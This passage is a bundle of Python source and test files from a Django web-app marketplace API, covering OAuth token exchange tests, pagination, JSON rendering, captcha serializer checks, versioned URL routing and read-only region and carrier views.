            url, client_key=self.access.key, client_secret=self.access.secret,
            resource_owner_key=t.key, resource_owner_secret=t.secret,
            verifier=t.verifier, callback_uri=self.access.redirect_uri)
        res = self.client.get(url, HTTP_HOST='testserver',
                              HTTP_AUTHORIZATION=auth_header)
        eq_(res.status_code, 200)
        data = dict(urlparse.parse_qsl(res.content))
        # The request token is exchanged for an access token and destroyed.
        assert Token.objects.filter(
            token_type=ACCESS_TOKEN,
            key=data['oauth_token'],
            secret=data['oauth_token_secret'],
            user=t.user,
            creds=self.access).exists()
        assert not Token.objects.filter(
            token_type=REQUEST_TOKEN,
            key=t.key).exists()
    def test_bad_access_request(self):
        t = Token.generate_new(REQUEST_TOKEN, self.access)
        url = urlparse.urljoin(settings.SITE_URL,
                               reverse('mkt.developers.oauth_access_request'))
        # Wrong everything: token used as consumer key, random owner creds.
        url, auth_header = self._oauth_request_info(
            url, client_key=t.key, client_secret=t.secret,
            resource_owner_key=generate(), resource_owner_secret=generate(),
            verifier=generate(), callback_uri=self.access.redirect_uri)
        res = self.client.get(url, HTTP_HOST='testserver',
                              HTTP_AUTHORIZATION=auth_header)
        eq_(res.status_code, 401)
        assert not Token.objects.filter(token_type=ACCESS_TOKEN).exists()
    def test_token_request(self):
        url = urlparse.urljoin(settings.SITE_URL,
                               reverse('mkt.developers.oauth_token_request'))
        url, auth_header = self._oauth_request_info(
            url, client_key=self.access.key, client_secret=self.access.secret,
            callback_uri=self.access.redirect_uri)
        res = self.client.get(url, HTTP_HOST='testserver',
                              HTTP_AUTHORIZATION=auth_header)
        eq_(res.status_code, 200)
        data = dict(urlparse.parse_qsl(res.content))
        assert Token.objects.filter(
            token_type=REQUEST_TOKEN,
            key=data['oauth_token'],
            secret=data['oauth_token_secret'],
            creds=self.access).exists()
    def test_bad_token_request(self):
        url = urlparse.urljoin(settings.SITE_URL,
                               reverse('mkt.developers.oauth_token_request'))
        # Wrong consumer secret -> no request token issued.
        url, auth_header = self._oauth_request_info(
            url, client_key=self.access.key, client_secret=generate(),
            callback_uri=self.access.redirect_uri)
        res = self.client.get(url, HTTP_HOST='testserver',
                              HTTP_AUTHORIZATION=auth_header)
        eq_(res.status_code, 401)
        assert not Token.objects.filter(token_type=REQUEST_TOKEN).exists()
########NEW FILE########
__FILENAME__ = test_paginator
from urlparse import urlparse
from django.core.paginator import Paginator
from django.http import QueryDict
import mock
from elasticutils.contrib.django import S
from nose.tools import eq_
from test_utils import RequestFactory
from amo.tests import TestCase
from mkt.api.paginator import MetaSerializer, ESPaginator
from mkt.webapps.models import WebappIndexer
class TestSearchPaginator(TestCase):
    """The Elasticsearch-backed paginator must not issue extra queries."""
    @mock.patch('pyelasticsearch.client.ElasticSearch.send_request')
    def test_single_hit(self, _mock):
        """Test the ES paginator only queries ES one time."""
        ESPaginator(S(WebappIndexer), 5).object_list.execute()
        eq_(_mock.call_count, 1)
class TestMetaSerializer(TestCase):
    """MetaSerializer turns a Paginator page into offset/limit pagination
    metadata with next/previous links."""
    def setUp(self):
        self.url = '/api/whatever'
        self.request = RequestFactory().get(self.url)
    def get_serialized_data(self, page):
        return MetaSerializer(page, context={'request': self.request}).data
    def test_simple(self):
        # Everything fits on one page: no next/previous links.
        data = ['a', 'b', 'c']
        per_page = 3
        page = Paginator(data, per_page).page(1)
        serialized = self.get_serialized_data(page)
        eq_(serialized['offset'], 0)
        eq_(serialized['next'], None)
        eq_(serialized['previous'], None)
        eq_(serialized['total_count'], len(data))
        eq_(serialized['limit'], per_page)
    def test_first_page_of_two(self):
        data = ['a', 'b', 'c', 'd', 'e']
        per_page = 3
        page = Paginator(data, per_page).page(1)
        serialized = self.get_serialized_data(page)
        eq_(serialized['offset'], 0)
        eq_(serialized['total_count'], len(data))
        eq_(serialized['limit'], per_page)
        eq_(serialized['previous'], None)
        next = urlparse(serialized['next'])
        eq_(next.path, self.url)
        eq_(QueryDict(next.query), QueryDict('limit=3&offset=3'))
    def test_third_page_of_four(self):
        data = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
        per_page = 2
        page = Paginator(data, per_page).page(3)
        serialized = self.get_serialized_data(page)
        # Third page will begin after fourth item
        # (per_page * number of pages before) item.
        eq_(serialized['offset'], 4)
        eq_(serialized['total_count'], len(data))
        eq_(serialized['limit'], per_page)
        prev = urlparse(serialized['previous'])
        eq_(prev.path, self.url)
        eq_(QueryDict(prev.query), QueryDict('limit=2&offset=2'))
        next = urlparse(serialized['next'])
        eq_(next.path, self.url)
        eq_(QueryDict(next.query), QueryDict('limit=2&offset=6'))
    def test_fourth_page_of_four(self):
        data = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
        per_page = 2
        page = Paginator(data, per_page).page(4)
        serialized = self.get_serialized_data(page)
        # Fourth (last) page begins after the sixth item
        # (per_page * number of pages before); no next link.
        eq_(serialized['offset'], 6)
        eq_(serialized['total_count'], len(data))
        eq_(serialized['limit'], per_page)
        prev = urlparse(serialized['previous'])
        eq_(prev.path, self.url)
        eq_(QueryDict(prev.query), QueryDict('limit=2&offset=4'))
        eq_(serialized['next'], None)
    def test_without_request_path(self):
        # Without a request in context the links have no path, only query.
        data = ['a', 'b', 'c', 'd', 'e']
        per_page = 2
        page = Paginator(data, per_page).page(2)
        serialized = MetaSerializer(page).data
        eq_(serialized['offset'], 2)
        eq_(serialized['total_count'], len(data))
        eq_(serialized['limit'], per_page)
        prev = urlparse(serialized['previous'])
        eq_(prev.path, '')
        eq_(QueryDict(prev.query), QueryDict('limit=2&offset=0'))
        next = urlparse(serialized['next'])
        eq_(next.path, '')
        eq_(QueryDict(next.query), QueryDict('limit=2&offset=4'))
    def test_with_request_path_override_existing_params(self):
        # Existing limit/offset params are overridden in the links; other
        # query params are preserved.
        self.url = '/api/whatever/?limit=0&offset=xxx&extra&superfluous=yes'
        self.request = RequestFactory().get(self.url)
        data = ['a', 'b', 'c', 'd', 'e', 'f']
        per_page = 2
        page = Paginator(data, per_page).page(2)
        serialized = self.get_serialized_data(page)
        eq_(serialized['offset'], 2)
        eq_(serialized['total_count'], len(data))
        eq_(serialized['limit'], per_page)
        prev = urlparse(serialized['previous'])
        eq_(prev.path, '/api/whatever/')
        eq_(QueryDict(prev.query),
            QueryDict('limit=2&offset=0&extra=&superfluous=yes'))
        next = urlparse(serialized['next'])
        eq_(next.path, '/api/whatever/')
        eq_(QueryDict(next.query),
            QueryDict('limit=2&offset=4&extra=&superfluous=yes'))
########NEW FILE########
__FILENAME__ = test_renderers
from nose.tools import eq_
from amo.tests import TestCase
from mkt.api.renderers import SuccinctJSONRenderer
class TestSuccinctJSONRenderer(TestCase):
    """SuccinctJSONRenderer should emit compact JSON unless indenting is
    requested via renderer context or the Accept header."""
    def setUp(self):
        self.renderer = SuccinctJSONRenderer()
        self.input = {'foo': 'bar'}
    def test_no_spaces(self):
        # Default: no separators whitespace at all.
        output = self.renderer.render(self.input)
        eq_(output, '{"foo":"bar"}')
    def test_indent_context(self):
        # An explicit indent in the renderer context wins over the default.
        output = self.renderer.render(self.input,
                                      renderer_context={'indent': 4})
        eq_(output, '{\n    "foo": "bar"\n}')
    def test_accepted_header(self):
        # `indent` can also come in as a media-type parameter.
        header = 'application/json; indent=4'
        output = self.renderer.render(self.input, accepted_media_type=header)
        eq_(output, '{\n    "foo": "bar"\n}')
########NEW FILE########
__FILENAME__ = test_serializer
# -*- coding: utf-8 -*-
from decimal import Decimal
import json
from django.core.handlers.wsgi import WSGIRequest
from django.test import TestCase
from django.utils.http import urlencode
import mock
from nose.tools import eq_, ok_
from rest_framework.serializers import Serializer, ValidationError
from simplejson import JSONDecodeError
from test_utils import RequestFactory
from users.models import UserProfile
from mkt.api.serializers import PotatoCaptchaSerializer, URLSerializerMixin
from mkt.site.fixtures import fixture
from mkt.site.tests.test_forms import PotatoCaptchaTestCase
class TestPotatoCaptchaSerializer(PotatoCaptchaTestCase):
    """The potato captcha is only enforced for anonymous users: the hidden
    `tuber` field must stay empty and `sprout` must equal 'potato'."""
    fixtures = fixture('user_999')
    def test_success_authenticated(self):
        # Authenticated users bypass the captcha entirely.
        self.request.user = UserProfile.objects.get(id=999)
        self.request.user.is_authenticated = lambda: True
        serializer = PotatoCaptchaSerializer(data={}, context=self.context)
        eq_(serializer.is_valid(), True)
    def test_success_anonymous(self):
        # Correct honeypot values: empty tuber, sprout == 'potato'.
        data = {'tuber': '', 'sprout': 'potato'}
        serializer = PotatoCaptchaSerializer(data=data, context=self.context)
        eq_(serializer.is_valid(), True)
    def test_no_context(self):
        # The serializer requires a request in its context to decide whether
        # the captcha applies.
        data = {'tuber': '', 'sprout': 'potato'}
        with self.assertRaises(ValidationError):
            PotatoCaptchaSerializer(data=data)
    def test_error_anonymous_bad_tuber(self):
        data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': 'potato'}
        serializer = PotatoCaptchaSerializer(data=data, context=self.context)
        eq_(serializer.is_valid(), False)
    def test_error_anonymous_bad_sprout(self):
        data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': ''}
        serializer = PotatoCaptchaSerializer(data=data, context=self.context)
        eq_(serializer.is_valid(), False)
    def test_error_anonymous_bad_tuber_and_sprout(self):
        serializer = PotatoCaptchaSerializer(data={}, context=self.context)
        eq_(serializer.is_valid(), False)
class TestURLSerializerMixin(TestCase):
    """URLSerializerMixin.get_url should reverse '<url_basename>-detail' with
    the object's pk and the current request."""
    # Throwaway serializer mixing URLSerializerMixin into a plain Serializer;
    # its Meta is rebuilt per-test in setUp().
    SerializerClass = type('Potato', (URLSerializerMixin, Serializer),
                           {'Meta': None})
    Struct = type('Struct', (object,), {})
    url_basename = 'potato'
    def setUp(self):
        self.SerializerClass.Meta = type('Meta', (self.Struct,),
                                         {'model': UserProfile,
                                          'url_basename': self.url_basename})
        self.request = RequestFactory().get('/')
        self.request.API_VERSION = 1
        self.serializer = self.SerializerClass(context=
                                               {'request': self.request})
        # Minimal stand-in for a model instance; only pk is needed.
        self.obj = self.Struct()
        self.obj.pk = 42
    @mock.patch('mkt.api.serializers.reverse')
    def test_get_url(self, mock_reverse):
        self.serializer.get_url(self.obj)
        reverse_args, reverse_kwargs = mock_reverse.call_args
        ok_(mock_reverse.called)
        eq_(reverse_args[0], '%s-detail' % self.url_basename)
        eq_(type(reverse_kwargs['request']), WSGIRequest)
        eq_(reverse_kwargs['kwargs']['pk'], self.obj.pk)
########NEW FILE########
__FILENAME__ = test_throttle
########NEW FILE########
__FILENAME__ = test_urls
from mock import patch
from nose.tools import eq_, ok_
from django.core.urlresolvers import resolve, Resolver404
import amo.tests
from mkt.api.urls import include_version
# Semantic names for indexing into the tuple returned by include():
# item 0 is the urlconf module, item 2 is the instance namespace.
MODULE, NAMESPACE = 0, 2
# Semantic name for indexing into the tuple returned by resolve():
# item 0 is the resolved view function.
FUNCTION = 0
class TestIncludeVersion(amo.tests.TestCase):
    """include_version() must namespace every version except the current one,
    so reversing always hits the current API version."""
    def includes(self):
        return include_version(1), include_version(2)
    @patch('django.conf.settings.API_CURRENT_VERSION', 1)
    def test_v1(self):
        v1, v2 = self.includes()
        # v1 is current: no namespace; v2 gets 'api-v2'.
        eq_(v1[NAMESPACE], None)
        eq_(v2[NAMESPACE], 'api-v2')
        ok_('v1' in v1[MODULE].__file__)
        ok_('v2' in v2[MODULE].__file__)
    @patch('django.conf.settings.API_CURRENT_VERSION', 2)
    def test_v2(self):
        v1, v2 = self.includes()
        # v2 is current: no namespace; v1 gets 'api-v1'.
        eq_(v1[NAMESPACE], 'api-v1')
        eq_(v2[NAMESPACE], None)
        ok_('v1' in v1[MODULE].__file__)
        ok_('v2' in v2[MODULE].__file__)
class BaseTestAPIVersionURLs(object):
    """
    Mixin for API version URL tests providing helpful assertions for common
    testing scenarios.
    """
    def assertViewName(self, url, view_name):
        """
        Assert that a resolution of the passed URL is for the view with the
        passed name.
        """
        resolved = resolve(url)
        eq_(resolved[FUNCTION].func_name, view_name)
    def assertView404(self, url):
        """
        Assert that a resolution of the passed URL does one of the following
        two things, each of which indicate a 404:
        1) Raises a Resolver404 error.
        2) Resolves to a view with the name 'EndpointRemoved'.
        """
        try:
            resolved = resolve(url)
        except Resolver404:
            # No pattern matched at all: that is a 404, nothing more to check.
            pass
        else:
            # A pattern matched; it must be the 404-only EndpointRemoved view.
            eq_(resolved[FUNCTION].func_name, 'EndpointRemoved')
class TestAPIv1URLs(BaseTestAPIVersionURLs, amo.tests.TestCase):
    """
    Tests for expected changes of URLs between versions of the API using the v1
    urlconf.
    """
    urls = 'mkt.api.v1.urls'
    def test_collections(self):
        """
        Tests the v1 half of a move of the collection endpoints from:
        - v1: /rocketfuel/collections/
        - v2: /feed/collections/
        """
        self.assertViewName('/rocketfuel/collections/', 'CollectionViewSet')
        self.assertView404('/feed/collections/')
class TestAPIv2URLs(BaseTestAPIVersionURLs, amo.tests.TestCase):
    """
    Tests for expected changes of URLs between versions of the API using the v2
    urlconf.
    """
    urls = 'mkt.api.v2.urls'
    def test_collections(self):
        """
        Tests the v2 half of a move of the collection endpoints from:
        - v1: /rocketfuel/collections/
        - v2: /feed/collections/
        """
        self.assertView404('/rocketfuel/collections/')
        self.assertViewName('/feed/collections/', 'CollectionViewSet')
########NEW FILE########
__FILENAME__ = test_views
import json
from mock import patch
from nose import SkipTest
from nose.tools import eq_, ok_
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import Http404, HttpRequest
from django.test.utils import override_settings
from test_utils import RequestFactory
import amo.tests
from amo.helpers import urlparams
import mkt
from mkt.api.tests.test_oauth import RestOAuth
from mkt.api.views import ErrorViewSet, endpoint_removed
from mkt.site.fixtures import fixture
class TestErrorService(RestOAuth):
    """The /error endpoint must raise, and the API error handler must produce
    a sanitized payload (plus traceback details only when DEBUG=True)."""
    def setUp(self):
        if not settings.ENABLE_API_ERROR_SERVICE:
            # Because this service is activated in urls, you can't reliably
            # test it if the setting is False, because you'd need to force
            # django to re-parse urls before and after the test.
            raise SkipTest()
        super(TestErrorService, self).setUp()
        self.url = reverse('error-list')
    def verify_exception(self, got_request_exception):
        # The got_request_exception signal must fire with the failing view
        # as sender and the original HttpRequest.
        exception_handler_args = got_request_exception.send.call_args
        eq_(exception_handler_args[0][0], ErrorViewSet)
        eq_(exception_handler_args[1]['request'].path, self.url)
        ok_(isinstance(exception_handler_args[1]['request'], HttpRequest))
    @override_settings(DEBUG=False)
    @patch('mkt.api.exceptions.got_request_exception')
    def test_error_service_debug_false(self, got_request_exception):
        res = self.client.get(self.url)
        data = json.loads(res.content)
        # Production mode: only the generic detail message leaks out.
        eq_(data.keys(), ['detail'])
        eq_(data['detail'], 'Internal Server Error')
        self.verify_exception(got_request_exception)
    @override_settings(DEBUG=True)
    @patch('mkt.api.exceptions.got_request_exception')
    def test_error_service_debug_true(self, got_request_exception):
        res = self.client.get(self.url)
        data = json.loads(res.content)
        # Debug mode: error message and traceback are included.
        eq_(set(data.keys()), set(['detail', 'error_message', 'traceback']))
        eq_(data['detail'], 'Internal Server Error')
        eq_(data['error_message'], 'This is a test.')
        self.verify_exception(got_request_exception)
class TestConfig(RestOAuth):
    """Tests for the anonymous site-config endpoint (settings + waffle)."""
    fixtures = fixture('user_2519')
    def setUp(self):
        super(TestConfig, self).setUp()
        self.url = reverse('site-config')
    # NOTE(review): camelCase name predates the usual test_ convention;
    # nose still collects it because it starts with 'test'.
    def testConfig(self):
        self.create_switch('allow-refund', db=True)
        res = self.anon.get(self.url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['settings']['SITE_URL'], 'http://testserver')
        # The freshly-created waffle switch must be reported as active.
        switch = data['waffle']['switches']['allow-refund']
        eq_(switch['name'], 'allow-refund')
        eq_(switch['active'], True)
    def test_cors(self):
        self.assertCORS(self.anon.get(self.url), 'get')
class TestRegion(RestOAuth):
    """Tests for the read-only regions API (list + detail by slug)."""
    def test_list(self):
        res = self.anon.get(urlparams(reverse('regions-list')))
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        for row in data['objects']:
            region = mkt.regions.REGIONS_DICT.get(row['slug'])
            eq_(row['name'], region.name)
            eq_(row['slug'], region.slug)
            eq_(row['id'], region.id)
            eq_(row['default_currency'], region.default_currency)
            eq_(row['default_language'], region.default_language)
        # Every known region is present (no pagination truncation).
        eq_(len(data['objects']), len(mkt.regions.REGIONS_DICT))
        eq_(data['meta']['total_count'], len(mkt.regions.REGIONS_DICT))
    def test_detail(self):
        res = self.get_region('br')
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        region = mkt.regions.REGIONS_DICT['br']
        self.assert_matches_region(data, region)
    def test_detail_worldwide(self):
        # 'worldwide' is a legacy alias that maps to 'restofworld'.
        res = self.get_region('worldwide')
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        region = mkt.regions.REGIONS_DICT['restofworld']
        self.assert_matches_region(data, region)
    def test_detail_bad_region(self):
        res = self.get_region('foo')
        eq_(res.status_code, 404)
    def assert_matches_region(self, data, region):
        # Shared field-by-field comparison for detail responses.
        eq_(data['name'], region.name)
        eq_(data['slug'], region.slug)
        eq_(data['id'], region.id)
        eq_(data['default_currency'], region.default_currency)
        eq_(data['default_language'], region.default_language)
    def get_region(self, slug):
        return self.anon.get(reverse('regions-detail', kwargs={'pk': slug}))
class TestCarrier(RestOAuth):
    """Tests for the read-only carriers API (list + detail by slug)."""
    def test_list(self):
        res = self.anon.get(reverse('carriers-list'))
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        for row in data['objects']:
            # Each serialized row must match the constant it came from.
            carrier = mkt.carriers.CARRIER_MAP.get(row['slug'])
            eq_(row['name'], carrier.name)
            eq_(row['slug'], carrier.slug)
            eq_(row['id'], carrier.id)
        # Every known carrier is present in the listing.
        eq_(len(data['objects']), len(mkt.carriers.CARRIER_MAP))
        eq_(data['meta']['total_count'], len(mkt.carriers.CARRIER_MAP))
    def test_detail(self):
        url = reverse('carriers-detail', kwargs={'pk': 'carrierless'})
        res = self.anon.get(url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        expected = mkt.carriers.CARRIER_MAP['carrierless']
        eq_(data['name'], expected.name)
        eq_(data['slug'], expected.slug)
        eq_(data['id'], expected.id)
class TestEndpointRemoved(amo.tests.TestCase):
    """endpoint_removed must 404 for every HTTP method and be CSRF exempt."""
    def setUp(self):
        self.factory = RequestFactory()
    def test_exempt(self):
        # csrf_exempt sets this attribute on the wrapped view.
        ok_(endpoint_removed.csrf_exempt)
    def test_404(self):
        for verb in ('get', 'post', 'options'):
            request = getattr(self.factory, verb)('/')
            with self.assertRaises(Http404):
                endpoint_removed(request)
########NEW FILE########
__FILENAME__ = urls
"""
API URL versioning goes here.
The "current" version should be marked via the empty pattern. Each other
version's URLs should be loaded in this way, with the most recent versions
first:
url('^v2/', include('mkt.api.v2.urls')),
url('^v1/', include('mkt.api.v1.urls')),
Each version's URLs should live in its own submodule, and should inherit from
the previous version's patterns. Example:
from mkt.api.v1.urls import urlpatterns as v1_urls
router = SimpleRouter()
router.register(r'widgets', WidgetViewSet, base_name='widget')
urlpatterns = patterns('',
url(r'^widgets/', include(feed.urls)),
) + v1_urls
Strategies for deprecating and removing endpoints are currently being discussed
in bug 942934.
"""
from django.conf import settings
from django.conf.urls import include, patterns, url
def include_version(version):
    """
    Return an include() of the URL patterns for the passed API version.
    Any version other than `settings.API_CURRENT_VERSION` gets an
    'api-v<version>' namespace, which guarantees that reversed URLs always
    resolve to the current version.
    """
    urlconf = 'mkt.api.v%d.urls' % version
    if version == settings.API_CURRENT_VERSION:
        return include(urlconf)
    return include(urlconf, namespace='api-v%d' % version)
urlpatterns = patterns('',
    url('^v2/', include_version(2)),
    url('^v1/', include_version(1)),
    # Necessary for backwards-compatibility. We assume that this always means
    # API version 1. The namespace ensures that no URLs are ever reversed to
    # this pattern. Yummycake because we already ate the tastypie.
    url('', include('mkt.api.v1.urls', namespace='yummycake')),
)
########NEW FILE########
__FILENAME__ = urls
from django.conf import settings
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.abuse.urls import api_patterns as abuse_api_patterns
from mkt.account.urls import api_patterns as account_api_patterns
from mkt.api.base import SubRouter, SubRouterWithFormat
from mkt.api.views import (CarrierViewSet, CategoryViewSet,
error_reporter, ErrorViewSet, PriceTierViewSet,
PriceCurrencyViewSet, RefreshManifestViewSet,
RegionViewSet, site_config)
from mkt.collections.views import CollectionImageViewSet, CollectionViewSet
from mkt.comm.urls import api_patterns as comm_api_patterns
from mkt.developers.urls import dev_api_patterns, payments_api_patterns
from mkt.features.views import AppFeaturesList
from mkt.receipts.urls import receipt_api_patterns
from mkt.reviewers.urls import api_patterns as reviewer_api_patterns
from mkt.search.views import (FeaturedSearchView, RocketbarView, SearchView,
SuggestionsView)
from mkt.stats.urls import stats_api_patterns, txn_api_patterns
from mkt.submit.views import PreviewViewSet, StatusViewSet, ValidationViewSet
from mkt.webapps.views import AppViewSet, PrivacyPolicyViewSet
# Routers for v1 of the API. Each SimpleRouter generates list/detail routes;
# the Sub* routers hang extra endpoints off a parent object URL.
rocketfuel = SimpleRouter()
rocketfuel.register(r'collections', CollectionViewSet,
                    base_name='collections')
# /rocketfuel/collections/<pk>/image/ (with optional format suffix).
subcollections = SubRouterWithFormat()
subcollections.register('image', CollectionImageViewSet,
                        base_name='collection-image')
apps = SimpleRouter()
apps.register(r'preview', PreviewViewSet, base_name='app-preview')
apps.register(r'validation', ValidationViewSet, base_name='app-validation')
apps.register(r'category', CategoryViewSet, base_name='app-category')
apps.register(r'status', StatusViewSet, base_name='app-status')
apps.register(r'app', AppViewSet, base_name='app')
# Endpoints nested under /apps/app/<pk>/.
subapps = SubRouter()
subapps.register('refresh-manifest', RefreshManifestViewSet,
                 base_name='app-refresh-manifest')
subapps.register('privacy', PrivacyPolicyViewSet,
                 base_name='app-privacy-policy')
services = SimpleRouter()
# The error service is dev-only; see ErrorViewSet.
if settings.ENABLE_API_ERROR_SERVICE:
    services.register(r'error', ErrorViewSet, base_name='error')
services.register(r'carrier', CarrierViewSet, base_name='carriers')
services.register(r'region', RegionViewSet, base_name='regions')
services.register(r'price-tier', PriceTierViewSet,
                  base_name='price-tier')
services.register(r'price-currency', PriceCurrencyViewSet,
                  base_name='price-currency')
# v1 URL patterns. Order matters: the more specific /apps/search/* patterns
# must precede the generic /apps/search/ one.
urlpatterns = patterns('',
    url('', include('mkt.fireplace.urls')),
    url('', include('mkt.darjeeling.urls')),
    url(r'^apps/', include(apps.urls)),
    url(r'^apps/app/', include(subapps.urls)),
    url(r'^apps/search/featured/', FeaturedSearchView.as_view(),
        name='featured-search-api'),
    url(r'^apps/search/suggest/', SuggestionsView.as_view(),
        name='suggestions-search-api'),
    url(r'^apps/search/rocketbar/', RocketbarView.as_view(),
        name='rocketbar-search-api'),
    url(r'^apps/search/', SearchView.as_view(), name='search-api'),
    url(r'^services/', include(services.urls)),
    url(r'^services/config/site/', site_config, name='site-config'),
    url(r'^fireplace/report_error/\d*', error_reporter, name='error-reporter'),
    url(r'^rocketfuel/', include(rocketfuel.urls)),
    url(r'^rocketfuel/collections/', include(subcollections.urls)),
    url(r'^apps/', include('mkt.versions.urls')),
    url(r'^apps/', include('mkt.ratings.urls')),
    url(r'^apps/features/', AppFeaturesList.as_view(),
        name='api-features-feature-list'),
    url('', include(abuse_api_patterns)),
    url('', include(account_api_patterns)),
    url('', include('mkt.installs.urls')),
    url('', include('mkt.prices.urls')),
    url('', include(reviewer_api_patterns)),
    url('', include('mkt.webpay.urls')),
    url('', include(dev_api_patterns)),
    url('', include(payments_api_patterns)),
    url('', include(receipt_api_patterns)),
    url('', include('mkt.monolith.urls')),
    url('', include(comm_api_patterns)),
    url('', include(stats_api_patterns)),
    url('', include(txn_api_patterns)),
)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.api.base import SubRouterWithFormat
from mkt.api.v1.urls import urlpatterns as v1_urls
from mkt.api.views import endpoint_removed
from mkt.collections.views import CollectionImageViewSet, CollectionViewSet
from mkt.feed.views import FeedAppImageViewSet, FeedAppViewSet, FeedItemViewSet
# v2 routers: the collection endpoints moved from /rocketfuel/ to /feed/.
feed = SimpleRouter()
feed.register(r'apps', FeedAppViewSet, base_name='feedapps')
feed.register(r'collections', CollectionViewSet, base_name='collections')
feed.register(r'items', FeedItemViewSet, base_name='feeditems')
subfeedapp = SubRouterWithFormat()
subfeedapp.register('image', FeedAppImageViewSet,
                    base_name='feed-app-image')
subcollections = SubRouterWithFormat()
subcollections.register('image', CollectionImageViewSet,
                        base_name='collection-image')
# v2 inherits all v1 patterns; the removed /rocketfuel/collections/ endpoint
# is shadowed first so it 404s via endpoint_removed.
urlpatterns = patterns('',
    url(r'^rocketfuel/collections/.*', endpoint_removed),
    url(r'^feed/', include(feed.urls)),
    url(r'^feed/apps/', include(subfeedapp.urls)),
    url(r'^feed/collections/', include(subcollections.urls)),
) + v1_urls
########NEW FILE########
__FILENAME__ = views
import json
from django.conf import settings
from django.http import Http404
from django.views import debug
from django.views.decorators.csrf import csrf_exempt
import commonware.log
import raven.base
import waffle
from cache_nuggets.lib import memoize
from rest_framework import generics
from rest_framework.decorators import permission_classes
from rest_framework.mixins import ListModelMixin, RetrieveModelMixin
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.serializers import (BooleanField, CharField, ChoiceField,
DecimalField, HyperlinkedIdentityField,
HyperlinkedRelatedField,
ModelSerializer)
from rest_framework.views import APIView
from rest_framework.viewsets import (GenericViewSet, ModelViewSet,
ReadOnlyModelViewSet)
import amo
from addons.models import Category, Webapp
from constants.payments import PAYMENT_METHOD_CHOICES, PROVIDER_CHOICES
from lib.constants import ALL_CURRENCIES
from mkt.api.authentication import RestOAuthAuthentication
from mkt.api.authorization import AllowAppOwner, GroupPermission
from mkt.api.base import (cors_api_view, CORSMixin, MarketplaceView,
SlugOrIdMixin)
from mkt.api.fields import SlugChoiceField
from mkt.api.serializers import CarrierSerializer, RegionSerializer
from mkt.carriers import CARRIER_MAP, CARRIERS
from mkt.regions.utils import parse_region
from mkt.constants.regions import REGIONS_CHOICES_SLUG, REGIONS_DICT
from mkt.webapps.tasks import _update_manifest
from mkt.prices.models import Price, PriceCurrency
log = commonware.log.getLogger('z.api')
class TestError(Exception):
    """Exception raised deliberately by ErrorViewSet to exercise the API
    error handler on dev servers."""
    pass
class ErrorViewSet(MarketplaceView, GenericViewSet):
    """Dev-only endpoint whose list view always raises TestError; only
    registered when settings.ENABLE_API_ERROR_SERVICE is on."""
    permission_classes = (AllowAny,)
    def list(self, request, *args, **kwargs):
        # All this does is throw an error. This is used for testing
        # the error handling on dev servers.
        # See mkt.api.exceptions for the error handler code.
        raise TestError('This is a test.')
class CategorySerializer(ModelSerializer):
    """Serializes app categories with a hyperlinked resource_uri."""
    name = CharField('name')
    resource_uri = HyperlinkedIdentityField(view_name='app-category-detail')
    class Meta:
        model = Category
        fields = ('name', 'id', 'resource_uri', 'slug')
        view_name = 'category'
class CategoryViewSet(ListModelMixin, RetrieveModelMixin, CORSMixin,
                      SlugOrIdMixin, MarketplaceView, GenericViewSet):
    """Read-only, anonymous, CORS-enabled list/detail API for webapp
    categories, addressable by slug or id."""
    model = Category
    serializer_class = CategorySerializer
    permission_classes = (AllowAny,)
    cors_allowed_methods = ('get',)
    slug_field = 'slug'
    def get_queryset(self):
        # Only webapp categories with a non-negative weight, heaviest first.
        qs = Category.objects.filter(type=amo.ADDON_WEBAPP,
                                     weight__gte=0)
        return qs.order_by('-weight')
class FlagSerializer(ModelSerializer):
    """Serializes all fields of a waffle Flag for the site-config endpoint."""
    class Meta:
        model = waffle.models.Flag
class SwitchSerializer(ModelSerializer):
    """Serializes all fields of a waffle Switch for the site-config endpoint."""
    class Meta:
        model = waffle.models.Switch
@memoize(prefix='config-settings')
def get_settings():
    """
    Return the whitelisted subset of the (safe) Django settings exposed by
    the site-config API. Memoized under the 'config-settings' cache prefix.
    """
    safe = debug.get_safe_settings()
    _settings = ['SITE_URL']
    # Dict comprehension replaces dict() over [key, value] lists: same
    # result, clearer intent, no intermediate two-element lists.
    return {k: safe[k] for k in _settings}
@cors_api_view(['GET'])
@permission_classes([AllowAny])
def site_config(request):
    """
    A resource that is designed to be exposed externally and contains
    settings or waffle flags that might be relevant to the client app.
    """
    def data(cls):
        # Serialize every flag/switch and key the result by name.
        as_list = cls(cls.Meta.model.objects.all().order_by('name'),
                      many=True).data
        return dict((d['name'], d) for d in as_list)
    return Response({
        # This is the git commit on IT servers.
        'version': getattr(settings, 'BUILD_ID_JS', ''),
        'waffle': {
            'flags': data(FlagSerializer),
            'switches': data(SwitchSerializer)
        },
        'settings': get_settings(),
    })
class RegionViewSet(CORSMixin, MarketplaceView, ReadOnlyModelViewSet):
    """Read-only, anonymous API exposing the static region constants."""
    cors_allowed_methods = ['get']
    authentication_classes = []
    permission_classes = [AllowAny]
    serializer_class = RegionSerializer
    # Page size equals the number of regions, so the list fits on one page.
    paginate_by = len(REGIONS_DICT)
    def get_queryset(self, *args, **kwargs):
        # "Queryset" is actually the static list of region constants.
        return REGIONS_DICT.values()
    def get_object(self, *args, **kwargs):
        # parse_region handles slug aliases (e.g. 'worldwide').
        region = parse_region(self.kwargs['pk'])
        if region is None:
            raise Http404
        else:
            return region
class CarrierViewSet(RegionViewSet):
    """Read-only API exposing the static carrier constants. Inherits CORS,
    auth and pagination setup from RegionViewSet."""
    serializer_class = CarrierSerializer
    def get_queryset(self, *args, **kwargs):
        # "Queryset" is the static list of carrier constants.
        return CARRIERS
    def get_object(self, *args, **kwargs):
        # Mirror RegionViewSet: an unknown slug should 404 instead of
        # letting None propagate into the serializer (which would 500).
